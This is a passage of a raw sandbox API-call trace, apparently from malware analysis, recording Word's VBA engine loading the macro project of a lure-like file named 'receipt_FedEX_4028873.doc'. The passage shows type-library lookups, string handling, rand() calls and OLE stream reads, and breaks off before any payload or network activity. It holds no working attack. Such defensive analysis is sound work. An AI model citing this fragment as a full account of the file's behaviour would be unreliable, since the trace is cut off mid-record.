lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0040.956] IMalloc:Free (This=0x7feffc15380, pv=0x6b1fd30) [0040.956] wcsncpy_s (in: _Destination=0x185da0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0040.956] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchLength=0x36 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc") returned 0x36 [0040.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", cchWideChar=55, lpMultiByteStr=0x185cd0, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", lpUsedDefaultChar=0x0) returned 55 [0040.956] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -4 [0040.956] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0 [0040.956] IUnknown:AddRef (This=0x6992850) returned 0x3 [0040.956] IUnknown:QueryInterface (in: This=0x6992850, riid=0x7fee45d85a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1861c8 | out: ppvObject=0x1861c8*=0x0) returned 0x80004002 [0040.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x186190, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0040.956] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0040.956] IUnknown:Release (This=0x6992850) returned 0x2 [0040.956] GetModuleFileNameW (in: hModule=0x7fee4230000, lpFilename=0x7fee460e4c0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0040.957] QueryPathOfRegTypeLib (in: guid=0x7fee45ddd50*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), wMaj=0x4, wMin=0x0, lcid=0x409, lpbstrPathName=0x186230 | out: lpbstrPathName=0x186230) returned 0x0 [0040.960] LoadTypeLibEx (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", regkind=0x2, pptlib=0x186288*=0x0 | out: pptlib=0x186288*=0x6990960) returned 0x0 [0040.967] IUnknown:AddRef (This=0x6990960) returned 0x2 [0040.967] ITypeLib:RemoteGetDocumentation (in: This=0x6990960, index=-1, refPtrFlags=0x1862a8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3157c0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3157c0*="\x57c0\x31") returned 0x0 [0040.967] IUnknown:QueryInterface (in: This=0x6990960, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186098 | out: ppvObject=0x186098*=0x0) returned 0x80004002 [0040.967] ITypeLib:RemoteGetLibAttr (in: This=0x6990960, ppTLibAttr=0x186090, pDummy=0x10 | out: ppTLibAttr=0x186090, pDummy=0x10) returned 0x0 [0040.967] ITypeLib:RemoteGetDocumentation (in: This=0x6990960, index=-1, refPtrFlags=0x0, pbstrName=0x186088, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8c1728b54a88 | out: pbstrName=0x186088*="Visual Basic For Applications", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8c1728b54a88) returned 0x0 [0040.967] StringFromGUID2 (in: rguid=0x68f0150*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x1860b0, cchMax=39 | out: lpsz="{000204EF-0000-0000-C000-000000000046}") returned 39 [0040.967] _ultow_s (in: _Value=0x4, _Buffer=0x185ffa, _BufferCount=0x10, _Radix=16 | out: _Buffer="4") returned 0x0 [0040.967] _ultow_s (in: _Value=0x2, _Buffer=0x185ffe, _BufferCount=0xe, _Radix=16 | out: _Buffer="2") returned 0x0 [0040.967] _ultow_s (in: _Value=0x9, _Buffer=0x186002, _BufferCount=0xc, _Radix=16 | out: _Buffer="9") returned 0x0 [0040.967] wcscpy_s (in: _Destination=0x3ea0b88, _SizeInWords=0x91, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0040.967] wcscpy_s (in: _Destination=0x3ea0b8e, _SizeInWords=0x8e, _Source="{000204EF-0000-0000-C000-000000000046}" | out: _Destination="{000204EF-0000-0000-C000-000000000046}") returned 0x0 [0040.967] wcscpy_s (in: _Destination=0x3ea0bda, _SizeInWords=0x68, _Source="#4.2#9#" | out: _Destination="#4.2#9#") returned 0x0 [0040.967] wcscpy_s (in: _Destination=0x3ea0be8, _SizeInWords=0x61, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0040.967] wcscpy_s (in: _Destination=0x3ea0c6e, _SizeInWords=0x1e, _Source="Visual Basic For Applications" | out: _Destination="Visual Basic For Applications") returned 0x0 [0040.967] ITypeLib:LocalReleaseTLibAttr (This=0x6990960) returned 0x0 [0040.967] IMalloc:Realloc (This=0x7feffc15380, pv=0x6a0ee20, cb=0x340) returned 0x6bbc040 [0040.967] wcscpy_s (in: _Destination=0x6bbc188, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0040.967] ITypeLib:RemoteGetDocumentation (in: This=0x6990960, index=-1, refPtrFlags=0x1861a8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3) returned 0x0 [0040.967] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0040.967] strcpy_s (in: _Dst=0x185fa0, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0040.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x185fa0, cbMultiByte=4, lpWideCharStr=0x185df0, cchWideChar=4 | out: lpWideCharStr="VBA") returned 4 [0040.967] IUnknown:AddRef (This=0x6992850) returned 0x3 [0040.967] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="VBA", lHashVal=0x10e2f7, pfName=0x185ec0, pBstrLibName=0x185df0 | out: pfName=0x185ec0*=0, pBstrLibName=0x185df0) returned 0x0 [0040.979] IUnknown:Release (This=0x6992850) returned 0x2 [0040.979] IMalloc:Alloc (This=0x7feffc15380, cb=0xc) returned 0x6b24d60 [0040.979] IMalloc:Free (This=0x7feffc15380, pv=0x68ef700) [0040.979] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68ef700 [0040.979] IMalloc:Free (This=0x7feffc15380, pv=0x6b24d60) [0040.979] wcsncpy_s (in: _Destination=0x185da0, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0040.979] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0040.979] IMalloc:Alloc (This=0x7feffc15380, cb=0x122) returned 0x6b1fd30 [0040.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x6b1fd30, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0040.979] IMalloc:Free (This=0x7feffc15380, pv=0x6b1fd30) [0040.979] IMalloc:Realloc (This=0x7feffc15380, pv=0x6aefe70, cb=0x440) returned 0x3e62720 [0040.979] wcscpy_s (in: _Destination=0x3e62920, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0040.979] wcsncpy_s (in: _Destination=0x185de0, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0040.979] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0040.979] IMalloc:Alloc (This=0x7feffc15380, cb=0x122) returned 0x6b1fd30 [0040.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x6b1fd30, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0040.979] IMalloc:Free (This=0x7feffc15380, pv=0x6b1fd30) [0040.979] wcsncpy_s (in: _Destination=0x185da0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0040.979] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchLength=0x36 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc") returned 0x36 [0040.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", cchWideChar=55, lpMultiByteStr=0x185cd0, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", lpUsedDefaultChar=0x0) returned 55 [0040.979] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -4 [0040.979] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0 [0040.979] IUnknown:AddRef (This=0x6990960) returned 0x3 [0040.979] IUnknown:QueryInterface (in: This=0x6990960, riid=0x7fee45d85a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1861c8 | out: ppvObject=0x1861c8*=0x0) returned 0x80004002 [0040.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x186190, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0040.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0040.980] IUnknown:Release (This=0x6990960) returned 0x2 [0040.980] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a470 [0040.980] IMalloc:GetSize (This=0x7feffc15380, pv=0x6b0a470) returned 0x0 [0040.980] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a480 [0040.980] IMalloc:GetSize (This=0x7feffc15380, pv=0x6b0a480) returned 0x0 [0040.980] VirtualQuery (in: lpAddress=0x186770, lpBuffer=0x186730, dwLength=0x30 | out: lpBuffer=0x186730*(BaseAddress=0x186000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xa000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0040.981] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a490 [0040.981] qsort (in: _Base=0x6b0a490, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee4385594 | out: _Base=0x6b0a490) [0040.981] IMalloc:Free (This=0x7feffc15380, pv=0x6b0a490) [0040.981] IMalloc:Alloc (This=0x7feffc15380, cb=0x18) returned 0x6b24d60 [0040.981] IMalloc:Alloc (This=0x7feffc15380, cb=0xc) returned 0x6b24e40 [0040.981] IMalloc:GetSize (This=0x7feffc15380, pv=0x6b24e40) returned 0xc [0040.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win16") returned 0x107ec1 [0040.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win32") returned 0x107f07 [0040.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win64") returned 0x107f78 [0040.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mac") returned 0x10b2b3 [0040.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA6") returned 0x1023ad [0040.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA7") returned 0x1023ae [0040.981] IMalloc:Free (This=0x7feffc15380, pv=0x6b0a480) [0040.981] IMalloc:Free (This=0x7feffc15380, pv=0x6b0a470) [0040.981] CoCreateGuid (in: pguid=0x186878 | out: pguid=0x186878*(Data1=0x2808dbd1, Data2=0x4062, Data3=0x43e5, Data4=([0]=0xaa, [1]=0xf1, [2]=0xd8, [3]=0x67, [4]=0x68, [5]=0xf7, [6]=0x89, [7]=0x3b))) returned 0x0 [0040.981] IMalloc:Alloc (This=0x7feffc15380, cb=0x6b0) returned 0x6bc0600 [0040.981] srand (_Seed=0x5196) [0040.981] rand () returned 2707 [0040.981] rand () returned 5367 [0040.981] rand () returned 3107 [0040.981] rand () returned 25991 [0040.982] rand () returned 22224 [0040.982] rand () returned 7173 [0040.982] rand () returned 3305 [0040.982] rand () returned 5542 [0040.982] rand () returned 21093 [0040.982] rand () returned 7093 [0040.982] rand () returned 29645 [0040.982] rand () returned 30555 [0040.982] rand () returned 4452 [0040.982] rand () returned 15519 [0040.982] rand () returned 22682 [0040.982] rand () returned 20118 [0040.982] rand () returned 26125 [0040.982] rand () returned 28117 [0040.982] rand () returned 31912 [0040.982] rand () returned 27549 [0040.982] rand () returned 25247 [0040.982] rand () returned 12135 [0040.982] rand () returned 31572 [0040.982] rand () returned 27055 [0040.982] rand () returned 11630 [0040.982] rand () returned 26157 [0040.982] rand () returned 24237 [0040.982] rand () returned 16615 [0040.982] rand () returned 23350 [0040.982] rand () returned 7360 [0040.982] rand () returned 27760 [0040.982] rand () returned 12132 [0040.982] rand () returned 17327 [0040.982] rand () returned 21962 [0040.982] rand () returned 16183 [0040.982] rand () returned 15783 [0040.982] rand () returned 1121 [0040.982] rand () returned 21376 [0040.982] rand () returned 32749 [0040.982] rand () returned 25148 [0040.982] rand () returned 9658 [0040.982] rand () returned 30828 [0040.982] rand () returned 21381 [0040.982] rand () returned 2205 [0040.982] rand () returned 5726 [0040.982] rand () returned 9584 [0040.982] rand () returned 20715 [0040.982] rand () returned 32595 [0040.982] rand () returned 28862 [0040.982] rand () returned 14600 [0040.982] rand () returned 4923 [0040.982] rand () returned 4446 [0040.982] rand () returned 16108 [0040.982] rand () returned 5071 [0040.982] rand () returned 15410 [0040.982] rand () returned 20183 [0040.982] rand () returned 12462 [0040.982] rand () returned 17989 [0040.983] rand () returned 31458 [0040.983] rand () returned 18644 [0040.983] rand () returned 30673 [0040.983] rand () returned 19407 [0040.983] rand () returned 27305 [0040.983] rand () returned 17548 [0040.983] rand () returned 16063 [0040.983] rand () returned 30463 [0040.983] rand () returned 24163 [0040.983] rand () returned 10684 [0040.983] rand () returned 27988 [0040.983] rand () returned 29462 [0040.983] rand () returned 27615 [0040.983] rand () returned 12361 [0040.983] rand () returned 12270 [0040.983] rand () returned 32455 [0040.983] rand () returned 19344 [0040.983] rand () returned 4390 [0040.983] rand () returned 29891 [0040.983] rand () returned 17470 [0040.983] rand () returned 24709 [0040.983] rand () returned 15992 [0040.983] rand () returned 21368 [0040.983] rand () returned 29281 [0040.983] rand () returned 31899 [0040.983] rand () returned 26360 [0040.983] rand () returned 4847 [0040.983] rand () returned 31574 [0040.983] rand () returned 13554 [0040.983] rand () returned 18585 [0040.983] rand () returned 16736 [0040.983] rand () returned 7237 [0040.983] rand () returned 23197 [0040.983] rand () returned 5740 [0040.983] rand () returned 4779 [0040.983] rand () returned 4703 [0040.983] rand () returned 27550 [0040.983] rand () returned 30144 [0040.983] rand () returned 30956 [0040.983] rand () returned 8479 [0040.983] rand () returned 4113 [0040.983] rand () returned 22157 [0040.983] rand () returned 11088 [0040.983] rand () returned 19919 [0040.983] rand () returned 30631 [0040.983] rand () returned 11027 [0040.983] rand () returned 3880 [0040.983] rand () returned 29775 [0040.983] rand () returned 11094 [0040.983] rand () returned 17086 [0040.983] rand () returned 14140 [0040.983] rand () returned 6418 [0040.984] rand () returned 10063 [0040.984] rand () returned 19533 [0040.984] rand () returned 28002 [0040.984] rand () returned 7273 [0040.984] rand () returned 20785 [0040.984] rand () returned 17203 [0040.984] rand () returned 31311 [0040.984] rand () returned 13060 [0040.984] rand () returned 7804 [0040.984] rand () returned 19517 [0040.984] rand () returned 8108 [0040.984] rand () returned 18357 [0040.984] rand () returned 32584 [0040.984] rand () returned 17782 [0040.984] rand () returned 30829 [0040.984] rand () returned 10872 [0040.984] rand () returned 24887 [0040.984] rand () returned 3400 [0040.984] rand () returned 13150 [0040.984] rand () returned 12465 [0040.984] rand () returned 24232 [0040.984] rand () returned 17635 [0040.984] rand () returned 23550 [0040.984] rand () returned 10932 [0040.984] rand () returned 28205 [0040.984] rand () returned 4579 [0040.984] rand () returned 9617 [0040.984] rand () returned 21130 [0040.984] rand () returned 9792 [0040.984] rand () returned 9004 [0040.984] rand () returned 27761 [0040.984] rand () returned 6131 [0040.984] rand () returned 26929 [0040.984] rand () returned 32025 [0040.984] rand () returned 24997 [0040.984] rand () returned 28071 [0040.984] rand () returned 3427 [0040.984] rand () returned 20695 [0040.984] rand () returned 5300 [0040.984] rand () returned 31713 [0040.984] rand () returned 21944 [0040.984] rand () returned 25355 [0040.984] rand () returned 20411 [0040.984] rand () returned 23582 [0040.984] rand () returned 20042 [0040.984] rand () returned 17851 [0040.984] rand () returned 31166 [0040.984] rand () returned 16930 [0040.984] rand () returned 24924 [0040.984] rand () returned 26987 [0040.984] rand () returned 29500 [0040.984] rand () returned 13885 [0040.984] rand () returned 14480 [0040.985] rand () returned 18822 [0040.985] rand () returned 8454 [0040.985] rand () returned 17612 [0040.985] rand () returned 15962 [0040.985] rand () returned 14336 [0040.985] rand () returned 6481 [0040.985] rand () returned 18178 [0040.985] rand () returned 21428 [0040.985] rand () returned 3130 [0040.985] rand () returned 9993 [0040.985] rand () returned 10473 [0040.985] rand () returned 3603 [0040.985] rand () returned 14630 [0040.985] rand () returned 5992 [0040.985] rand () returned 20643 [0040.985] rand () returned 4506 [0040.985] rand () returned 3755 [0040.985] rand () returned 1480 [0040.985] rand () returned 2806 [0040.985] rand () returned 23438 [0040.985] rand () returned 10827 [0040.985] rand () returned 6581 [0040.985] rand () returned 8456 [0040.985] rand () returned 4363 [0040.985] rand () returned 23299 [0040.985] rand () returned 27463 [0040.985] rand () returned 31590 [0040.985] rand () returned 9717 [0040.985] rand () returned 31858 [0040.985] rand () returned 430 [0040.985] rand () returned 30283 [0040.985] rand () returned 28720 [0040.985] rand () returned 3390 [0040.985] rand () returned 8207 [0040.985] rand () returned 19232 [0040.985] rand () returned 31508 [0040.985] rand () returned 1204 [0040.985] rand () returned 21647 [0040.985] rand () returned 13119 [0040.985] rand () returned 12059 [0040.985] rand () returned 11182 [0040.985] rand () returned 32173 [0040.985] rand () returned 10236 [0040.985] rand () returned 8669 [0040.985] rand () returned 31930 [0040.985] rand () returned 14804 [0040.986] rand () returned 25574 [0040.986] rand () returned 8767 [0040.986] rand () returned 20344 [0040.986] rand () returned 30000 [0040.986] rand () returned 2378 [0040.986] rand () returned 21735 [0040.986] rand () returned 21316 [0040.986] rand () returned 2498 [0040.986] rand () returned 4601 [0040.986] rand () returned 29939 [0040.986] rand () returned 7445 [0040.986] rand () returned 9647 [0040.986] rand () returned 27723 [0040.986] rand () returned 3306 [0040.986] rand () returned 19621 [0040.986] rand () returned 27614 [0040.986] rand () returned 26980 [0040.986] rand () returned 15346 [0040.986] rand () returned 3283 [0040.986] rand () returned 705 [0040.986] rand () returned 24758 [0040.986] rand () returned 23364 [0040.986] rand () returned 29509 [0040.986] rand () returned 1395 [0040.986] rand () returned 11463 [0040.986] rand () returned 6110 [0040.986] rand () returned 849 [0040.986] rand () returned 2820 [0040.986] rand () returned 25909 [0040.986] rand () returned 21623 [0040.986] rand () returned 22558 [0040.986] rand () returned 14353 [0040.986] rand () returned 31223 [0040.986] rand () returned 26552 [0040.986] rand () returned 14854 [0040.986] rand () returned 3735 [0040.986] rand () returned 5093 [0040.986] rand () returned 2729 [0040.986] rand () returned 9023 [0040.986] rand () returned 28680 [0040.987] CoCreateGuid (in: pguid=0x6a7c168 | out: pguid=0x6a7c168*(Data1=0x63586e75, Data2=0x96f9, Data3=0x483e, Data4=([0]=0xb5, [1]=0x3f, [2]=0x17, [3]=0x55, [4]=0x36, [5]=0xb1, [6]=0x30, [7]=0xbd))) returned 0x0 [0040.987] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x0) returned 0x6b0a470 [0040.987] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e62b70 [0040.987] strcpy_s (in: _Dst=0x6a7c1c8, _DstSize=0x1, _Src="" | out: _Dst="") returned 0x0 [0040.987] CExposedDocFile::OpenStream () returned 0x0 [0040.987] CExposedStream::Read () returned 0x0 [0040.987] IMalloc:Alloc (This=0x7feffc15380, cb=0x2028) returned 0x6bc0cc0 [0040.987] IMalloc:Alloc (This=0x7feffc15380, cb=0x10020*=0x10128) returned 0x6bc2cf0 [0040.987] CExposedStream::AddRef () returned 0x2 [0040.987] CExposedStream::Release () returned 0x1 [0040.988] CExposedStream::Read () returned 0x0 [0040.988] CExposedStream::Read () returned 0x0 [0040.991] GetProcAddress (hModule=0x7fee3a50000, lpProcName=0x7fee45f21d0) returned 0x0 [0040.991] CompareStringA (Locale=0x409, dwCmpFlags=0x3, lpString1="Test", cchCount1=-1, lpString2="Test", cchCount2=-1) returned 2 [0040.991] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x186874, cbMultiByte=2, lpWideCharStr=0x186888, cchWideChar=2 | out: lpWideCharStr="") returned 2 [0040.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x186800, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0040.992] lstrcmpiA (lpString1="", lpString2="Project") returned -1 [0040.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0040.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x186700, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0040.992] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0040.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x186610, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0040.992] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0040.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x186610, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0040.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x1864d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0040.992] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0040.992] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0040.992] IMalloc:Alloc (This=0x7feffc15380, cb=0x18) returned 0x6b24a00 [0040.992] IMalloc:Free (This=0x7feffc15380, pv=0x68ef700) [0040.992] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68ef700 [0040.992] IMalloc:Realloc (This=0x7feffc15380, pv=0x68ef700, cb=0x44) returned 0x6b82390 [0040.992] IMalloc:Free (This=0x7feffc15380, pv=0x6b24a00) [0040.992] strcpy_s (in: _Dst=0x6a7c1d8, _DstSize=0x8, _Src="Project" | out: _Dst="Project") returned 0x0 [0040.994] CLSIDFromString (in: 